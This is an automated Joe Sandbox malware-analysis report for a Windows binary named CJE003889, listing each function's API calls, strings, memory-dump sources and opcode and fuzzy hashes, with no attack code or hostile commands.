Function 00C64E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E7E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 68563842988bc5aca4f4aca3020780fad16946d829cbb4c98f88680403d74774
Instruction ID: 5eb10ffcbe9b52fa01e7f11c5b25635f5747b2659fc8a462847f0ba7d5d19ec0
Opcode Fuzzy Hash: 68563842988bc5aca4f4aca3020780fad16946d829cbb4c98f88680403d74774
Instruction Fuzzy Hash: 4AF01571501B11CFCB389F65E4D4816FBE1BF143293208A3EE1E682620C7739940DB40

Function 00C80791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C807B0

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: eec1de24710101476789f27590bc127337dcb21ba911ecd2aa9d199fbb19414b
Instruction ID: b107b270551d1f32259ed6465c55b95bc4e5986fba8e18c6d449bc8f0a1cd220
Opcode Fuzzy Hash: eec1de24710101476789f27590bc127337dcb21ba911ecd2aa9d199fbb19414b
Instruction Fuzzy Hash: 1FE0CD3690412857C720D6599C06FFA77DDDFC87A0F0542B5FD0CD7244D9609C8086D0

Function 00C8525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00C85266

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5aaaeae24a3f9bbb18aed53aab5f3fd5a656f68ee1f0dfe613488d2711e5f2d9
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 3DB0927644020C7BCE012A82EC02A493B199B42768F408020FB0C18162AAB3A664AA89

Function 010154AC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 010154C1

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 9578c7ca946471082df8dce423a5c533c4e559228ffa28d2917c657ef9f8e8bf
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 24E0BF7498010DEFDB00EFE4D9496DE7BB4EF04302F1045A1FD05D7681DB309E548A66

Function 010154B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 010154C1

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 07b0d36eded0fa505886779d535ec869a004a55562f16f293ee40437c5eb82df
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 22E0E67498010DDFDB00EFF4D9496DE7FB4EF04302F104161FD01D2281DA309D508A62

Non-executed Functions

Function 00CECABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CECB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CECB95
GetWindowLongW.USER32(?,000000F0), ref: 00CECBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CECC00
SendMessageW.USER32 ref: 00CECC29
_wcsncpy.LIBCMT ref: 00CECC95
GetKeyState.USER32(00000011), ref: 00CECCB6
GetKeyState.USER32(00000009), ref: 00CECCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CECCD9
GetKeyState.USER32(00000010), ref: 00CECCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CECD0C
SendMessageW.USER32 ref: 00CECD33
SendMessageW.USER32(?,00001030,?,00CEB348), ref: 00CECE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CECE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CECE60
SetCapture.USER32(?), ref: 00CECE69
ClientToScreen.USER32(?,?), ref: 00CECECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CECEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CECEF5
ReleaseCapture.USER32 ref: 00CECF00
GetCursorPos.USER32(?), ref: 00CECF3A
ScreenToClient.USER32(?,?), ref: 00CECF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00CECFA3
SendMessageW.USER32 ref: 00CECFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00CED00E
SendMessageW.USER32 ref: 00CED03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CED05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CED06D
GetCursorPos.USER32(?), ref: 00CED08D
ScreenToClient.USER32(?,?), ref: 00CED09A
GetParent.USER32(?), ref: 00CED0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00CED123
SendMessageW.USER32 ref: 00CED154
ClientToScreen.USER32(?,?), ref: 00CED1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CED1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00CED20C
SendMessageW.USER32 ref: 00CED22F
ClientToScreen.USER32(?,?), ref: 00CED281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CED2B5

Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC

GetWindowLongW.USER32(?,000000F0), ref: 00CED351

Strings

@GUI_DRAGID, xrefs: 00CECE9C
F, xrefs: 00CED235

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 4f82d59ca50c9d5b8cf4ba002405f24d3a89b4e74cb2d4b4fd11ef570b87cb44
Instruction ID: 046a24a9b12004e1db761cd71bdad10cd12000f867e6a56805ff24d66c1937ce
Opcode Fuzzy Hash: 4f82d59ca50c9d5b8cf4ba002405f24d3a89b4e74cb2d4b4fd11ef570b87cb44
Instruction Fuzzy Hash: E7428A74204381AFDB24CF26D885FAABBE5FF49310F14092DF566CB2A0C7719A52DB52

Function 00CE7DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CE84D0

Strings

%d/%02d/%02d, xrefs: 00CE8209

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 276d803a8f4e5018da8490a5c4a9ccdf6e26cf7557daba19ed14c4db49001138
Instruction ID: 3edf624b88a0bff5af52973659105ae29b995457e72b6cd5c17fca743c8ae71e
Opcode Fuzzy Hash: 276d803a8f4e5018da8490a5c4a9ccdf6e26cf7557daba19ed14c4db49001138
Instruction Fuzzy Hash: BD12D271500289ABEB259F66CC89FAF7BF8EF45310F104129F919EB2E1DB749A45CB10

Function 00C76F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C771C3
_memset.LIBCMT ref: 00C77539
_memmove.LIBCMT ref: 00C776AC

Strings

\b(?=\w), xrefs: 00CB3769
DEFINE, xrefs: 00CB2103
[:>:]], xrefs: 00C77492
Q\E, xrefs: 00C77FCB
[:<:]], xrefs: 00C77479
\b(?<=\w), xrefs: 00CB3773

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: a1225d7b347e79e4d84621c36dfd518584dfcac6c5cb6ade9b86ebeb1a512e5b
Instruction ID: 70b07bfff1519a5539ad1324a453500df16c2d22b46466ccc3d6628db636f172
Opcode Fuzzy Hash: a1225d7b347e79e4d84621c36dfd518584dfcac6c5cb6ade9b86ebeb1a512e5b
Instruction Fuzzy Hash: D693A171E04219DFDB24CF98C891BEDB7B1FF48310F25816AE959AB291E7709E81CB50

Function 00C648D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00C648DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9D665
IsIconic.USER32(?), ref: 00C9D66E
ShowWindow.USER32(?,00000009), ref: 00C9D67B
SetForegroundWindow.USER32(?), ref: 00C9D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C9D69B
GetCurrentThreadId.KERNEL32 ref: 00C9D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C9D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C9D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00C9D6CF
SetForegroundWindow.USER32(?), ref: 00C9D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D6E7
keybd_event.USER32(00000012,00000000), ref: 00C9D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D6FC
keybd_event.USER32(00000012,00000000), ref: 00C9D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D70A
keybd_event.USER32(00000012,00000000), ref: 00C9D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D719
keybd_event.USER32(00000012,00000000), ref: 00C9D71E
SetForegroundWindow.USER32(?), ref: 00C9D721
AttachThreadInput.USER32(?,?,00000000), ref: 00C9D748

Strings

Shell_TrayWnd, xrefs: 00C9D660

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 705d95c7d94943bc4c6424ea108e2eba4f96e153c9f27a88cbce7d883fa04857
Instruction ID: b0e02857745193172d0eb57d3b6ff605a4696ffa22ab31c51dc926e1e23a6275
Opcode Fuzzy Hash: 705d95c7d94943bc4c6424ea108e2eba4f96e153c9f27a88cbce7d883fa04857
Instruction Fuzzy Hash: F5315071A40358BBEF206BA19C89F7F7E6CEB44B50F114029FA05FA1D1CAB15941AAA1

Function 00CB8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00CB87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
Part of subcall function 00CB87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
Part of subcall function 00CB87E1: GetLastError.KERNEL32 ref: 00CB8865

_memset.LIBCMT ref: 00CB8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CB83A5
CloseHandle.KERNEL32(?), ref: 00CB83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CB83CD
GetProcessWindowStation.USER32 ref: 00CB83E6
SetProcessWindowStation.USER32(00000000), ref: 00CB83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CB840A

Part of subcall function 00CB81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CB8309), ref: 00CB81E0
Part of subcall function 00CB81CB: CloseHandle.KERNEL32(?,?,00CB8309), ref: 00CB81F2

Strings

winsta0, xrefs: 00CB83C8
, xrefs: 00CB8362
default, xrefs: 00CB8405

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 0612ca9bb7b93738739012872f93fb6a7854eecc007655da177aee718a7a38ee
Instruction ID: 83caf79a59a321904c1e32142ce3c344a93bd4c8d8f0f2d03625f331d3b9f7ef
Opcode Fuzzy Hash: 0612ca9bb7b93738739012872f93fb6a7854eecc007655da177aee718a7a38ee
Instruction Fuzzy Hash: 63814A71900249AFEF219FA4DC85BEE7BBDFF04304F144169F924A6261DB318E59EB60

Function 00CCC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00CCC78D
FindClose.KERNEL32(00000000), ref: 00CCC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC844
__swprintf.LIBCMT ref: 00CCC890
__swprintf.LIBCMT ref: 00CCC8D3

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

__swprintf.LIBCMT ref: 00CCC927

Part of subcall function 00C83698: __woutput_l.LIBCMT ref: 00C836F1

__swprintf.LIBCMT ref: 00CCC975

Part of subcall function 00C83698: __flsbuf.LIBCMT ref: 00C83713
Part of subcall function 00C83698: __flsbuf.LIBCMT ref: 00C8372B

__swprintf.LIBCMT ref: 00CCC9C4
__swprintf.LIBCMT ref: 00CCCA13
__swprintf.LIBCMT ref: 00CCCA62

Strings

%02d, xrefs: 00CCC91B, 00CCC925, 00CCC973, 00CCC9C2, 00CCCA11, 00CCCA60
%4d, xrefs: 00CCC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00CCC88A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: a8cc2dba80bd26d1fe27aff1359bdfade6dbe932527eca93200477e4f8c9e986
Instruction ID: f0f56c7ed107304d6d3c3aa8fcd54d08e2f2a0745c20fbc42f8332d46640e8e7
Opcode Fuzzy Hash: a8cc2dba80bd26d1fe27aff1359bdfade6dbe932527eca93200477e4f8c9e986
Instruction Fuzzy Hash: 18A10BB1408344ABC710EFA4C9C5EAFB7ECFF98704F40091DF59586191EA35EA49DB62

Function 00CCEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CCEFB6
_wcscmp.LIBCMT ref: 00CCEFCB
_wcscmp.LIBCMT ref: 00CCEFE2
GetFileAttributesW.KERNEL32(?), ref: 00CCEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00CCF00E
FindNextFileW.KERNEL32(00000000,?), ref: 00CCF026
FindClose.KERNEL32(00000000), ref: 00CCF031
FindFirstFileW.KERNEL32(*.*,?), ref: 00CCF04D
_wcscmp.LIBCMT ref: 00CCF074
_wcscmp.LIBCMT ref: 00CCF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCF09D
SetCurrentDirectoryW.KERNEL32(00D18920), ref: 00CCF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCF0C5
FindClose.KERNEL32(00000000), ref: 00CCF0D2
FindClose.KERNEL32(00000000), ref: 00CCF0E4

Strings

*.*, xrefs: 00CCF048

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: efdcbf86646f968575849430b34592d8a21241a1ee1385b7c382a3ce08fc9099
Instruction ID: ae8956efe103442a973c1487350c3801b5b7811370656471d04bc834c5c8b4f2
Opcode Fuzzy Hash: efdcbf86646f968575849430b34592d8a21241a1ee1385b7c382a3ce08fc9099
Instruction Fuzzy Hash: D531E3325002487BDB14EBA4EC89FEE77AD9F48760F1041BDE910D20A1DB70DB86DB65

Function 00CE0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00CEF910,00000000,?,00000000,?,?), ref: 00CE09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CE0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CE0A92
RegCloseKey.ADVAPI32(?), ref: 00CE0DB2
RegCloseKey.ADVAPI32(00000000), ref: 00CE0DBF

Strings

REG_MULTI_SZ, xrefs: 00CE0B7A
REG_SZ, xrefs: 00CE0AD0
REG_EXPAND_SZ, xrefs: 00CE0A2F
REG_QWORD, xrefs: 00CE0D00
REG_DWORD, xrefs: 00CE0C83
REG_BINARY, xrefs: 00CE0D4D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 3daed9f6c372e78ba9d3f698e81dcc6e744adbfcf27cccd4d0569fcc9cbe8754
Instruction ID: b0be421fd358ef821de6a8a93b4a6dbc8e97222b5700080a0016e5225ea7d818
Opcode Fuzzy Hash: 3daed9f6c372e78ba9d3f698e81dcc6e744adbfcf27cccd4d0569fcc9cbe8754
Instruction Fuzzy Hash: 57028B756006419FCB24EF15C891E2AB7E5FF89324F14885CF99A9B3A2CB70ED41DB81

Function 00CCF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CCF113
_wcscmp.LIBCMT ref: 00CCF128
_wcscmp.LIBCMT ref: 00CCF13F

Part of subcall function 00CC4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CC43A0

FindNextFileW.KERNEL32(00000000,?), ref: 00CCF16E
FindClose.KERNEL32(00000000), ref: 00CCF179
FindFirstFileW.KERNEL32(*.*,?), ref: 00CCF195
_wcscmp.LIBCMT ref: 00CCF1BC
_wcscmp.LIBCMT ref: 00CCF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCF1E5
SetCurrentDirectoryW.KERNEL32(00D18920), ref: 00CCF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCF20D
FindClose.KERNEL32(00000000), ref: 00CCF21A
FindClose.KERNEL32(00000000), ref: 00CCF22C

Strings

*.*, xrefs: 00CCF190

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c5ec39300a15f51a0f370d0d6371410e4e943f61be8923be7cf51573f8d207c5
Instruction ID: edabd5ce3be9b4838b240b014afbe60280b262992ba272517650065748c4afcf
Opcode Fuzzy Hash: c5ec39300a15f51a0f370d0d6371410e4e943f61be8923be7cf51573f8d207c5
Instruction Fuzzy Hash: 16310536500259BACB10EBA0EC98FEE77AE9F45320F14017DE910E20A0DB30DF87DA64

Function 00CCA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CCA20F
__swprintf.LIBCMT ref: 00CCA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00CCA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CCA293
_memset.LIBCMT ref: 00CCA2B2
_wcsncpy.LIBCMT ref: 00CCA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CCA323
CloseHandle.KERNEL32(00000000), ref: 00CCA32E
RemoveDirectoryW.KERNEL32(?), ref: 00CCA337
